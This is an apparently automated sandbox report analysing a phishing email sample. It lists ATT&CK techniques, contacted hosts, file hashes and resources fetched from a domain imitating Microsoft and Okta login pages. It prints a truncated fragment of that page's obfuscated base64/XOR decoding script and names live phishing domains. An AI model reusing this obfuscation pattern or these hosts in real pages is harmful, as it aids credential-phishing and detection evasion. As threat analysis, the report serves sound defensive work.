                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 31 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 12 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction

                No Antivirus matches
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        188.114.97.3
                                                                        v36ix.szsnqp.ruEuropean Union
                                                                        13335CLOUDFLARENETUStrue
                                                                        104.21.13.170
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        188.114.96.3
                                                                        unknownEuropean Union
                                                                        13335CLOUDFLARENETUSfalse
                                                                        172.67.70.233
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        52.109.76.144
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        95.101.182.112
                                                                        e329293.dscd.akamaiedge.netEuropean Union
                                                                        20940AKAMAI-ASN1EUfalse
                                                                        13.69.116.107
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        IP
                                                                        192.168.2.18
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1641941
                                                                        Start date and time:2025-03-18 16:21:20 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
                                                                        Detection:MAL
                                                                        Classification:mal100.phis.evad.winEML@25/36@46/110
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .eml
                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 40.69.42.241
                                                                        • Excluded domains from analysis (whitelisted): ecs.office.com, fe3.delivery.mp.microsoft.com, dual-s-0005-office.config.skype.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ecs.office.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtSetValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: quiltercheviot.uuvght.ru
                                                                        • VT rate limit hit for: y13tzxbjz1.moydow.de
                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):4.491638794581654
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:86A4A51EB6491AFE94528EE1379A78A6
                                                                        SHA1:52BEF1FF9BC66F76B0F741C839F67C048AB2C341
                                                                        SHA-256:F19C28ED0D38E14EDC84A7E71E17A429FF011017EFD2601C16D94138C0D3D9A9
                                                                        SHA-512:E887B4538CC41180C5B97B6A5609140DA8823A423F2EA3E4BC14D1B704697683C1DDEA5E6D4D47C866BF871E4F873FB748A9F35D518DF2CFA55D0D77B6FC1416
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):9648
                                                                        Entropy (8bit):7.9099172475143416
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4946EB373B18D178C93D473489673BB6
                                                                        SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                        SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                        SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):28584
                                                                        Entropy (8bit):7.992563951996154
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                        SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                        SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                        SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff2
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):3335
                                                                        Entropy (8bit):7.920585736827683
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DADCD54EE1BF8A260ED5289122D2FF93
                                                                        SHA1:5B359651C028A86C3E6FDD6223B8362C065DECE6
                                                                        SHA-256:0C2C1041650B139AA47E016BDB95163F97384487A1858F85760792862FDAAC3F
                                                                        SHA-512:ED53D5EB181D12539597E23CE96721F954052B8535A0801A1380F7F677B08346B56AFA842ACB42AD4ABBB822C01BBAC0BB3052D61B2D6E3FB04849EBE6C3CB7F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):17842
                                                                        Entropy (8bit):7.821645806304586
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4B52ECDC33382C9DCA874F551990E704
                                                                        SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                        SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                        SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):48316
                                                                        Entropy (8bit):5.6346993394709
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):268
                                                                        Entropy (8bit):5.111190711619041
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):10796
                                                                        Entropy (8bit):7.946024875001343
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10017)
                                                                        Category:downloaded
                                                                        Size (bytes):10245
                                                                        Entropy (8bit):5.437589264532084
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T152121Z&X-Amz-Expires=300&X-Amz-Signature=740f45a720998c47938f1f35aa27b630e9cecf67a7bc9d7db99a8bfda1749aba&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):128
                                                                        Entropy (8bit):4.750616928608237
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                        SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                        SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                        SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCT9uB0CLw6tjEgUNX1f-DRIFDRObJGMhhg1XGbYTmkgSSgmWqyHkTjQhbRIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0ISxE7WZQD-ba?alt=proto
                                                                        Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):1298
                                                                        Entropy (8bit):6.665390877423149
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:32CA2081553E969F9FDD4374134521AD
                                                                        SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                        SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                        SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):93276
                                                                        Entropy (8bit):7.997636438159837
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                        SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                        SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                        SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-vf2.woff2
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:downloaded
                                                                        Size (bytes):892
                                                                        Entropy (8bit):5.863167355052868
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:41D62CA205D54A78E4298367482B4E2B
                                                                        SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                        SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                        SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (15937), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):20964
                                                                        Entropy (8bit):5.975671680823454
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C9281BE7F4BD999DFFE628148C6F5BB9
                                                                        SHA1:1937BD8B21258C49EB84DF336C479C1CA8805880
                                                                        SHA-256:DDADF4B9DC5935A39278DB3FE44818802D02D22F7BE3D86BFF856F11633E1D27
                                                                        SHA-512:BEF22B328E8DD81D1BB44991D8CC9891ECBFEF9F9E832AE4DDD603FEA863E765A4D00D935BE4D6E18734A2FBCE47DC405F719D0BB730608A18534F1AB924A66F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/nTJ777/
                                                                        Preview:<script>..function iGQzzWhdGQ(PJGnKsChdo, LCQKueAUiY) {..let tRvBsJmzGt = '';..PJGnKsChdo = atob(PJGnKsChdo);..let LKpTVIrFPL = LCQKueAUiY.length;..for (let i = 0; i < PJGnKsChdo.length; i++) {.. tRvBsJmzGt += String.fromCharCode(PJGnKsChdo.charCodeAt(i) ^ LCQKueAUiY.charCodeAt(i % LKpTVIrFPL));..}..return tRvBsJmzGt;..}..var pGoVgDDknA = iGQzzWhdGQ(`
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10450)
                                                                        Category:downloaded
                                                                        Size (bytes):10498
                                                                        Entropy (8bit):5.327380141461276
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E0D37A504604EF874BAD26435D62011F
                                                                        SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                        SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                        SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                        Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):270
                                                                        Entropy (8bit):4.840496990713235
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):36696
                                                                        Entropy (8bit):7.988666025644622
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                        SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                        SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                        SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):2905
                                                                        Entropy (8bit):3.962263100945339
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab171
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):77073
                                                                        Entropy (8bit):7.876056172134186
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6849F4C7A7F7E7E7055A24911CE306F7
                                                                        SHA1:7E6710350C78318C0894894E1DA6CDDFE2B824C6
                                                                        SHA-256:256A71B904F26C4CA4736E35C853D96C42395D8DC801D68CDB5C3DC316290876
                                                                        SHA-512:E9ED211BE7E8CEB0ED9CB3D24EF67357FFFACE43A9EC98390340CFB0682472080C55403A1197CE839E785C6D68AEB93B4D0B4A57772E842B478A8DE66965FFB2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):43596
                                                                        Entropy (8bit):7.9952701440723475
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                        SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                        SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                        SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-vf.woff2
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):25216
                                                                        Entropy (8bit):7.947339442168474
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F9A795E2270664A7A169C73B6D84A575
                                                                        SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                        SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                        SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):26765
                                                                        Entropy (8bit):5.114987586674101
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1A862A89D5633FAC83D763886726740D
                                                                        SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                        SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                        SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/56ybfCjabGpJyUZ8916
                                                                        Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):35970
                                                                        Entropy (8bit):7.989503040923577
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                        SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                        SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                        SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                        Malicious:false
                                                                        Reputation:unknown
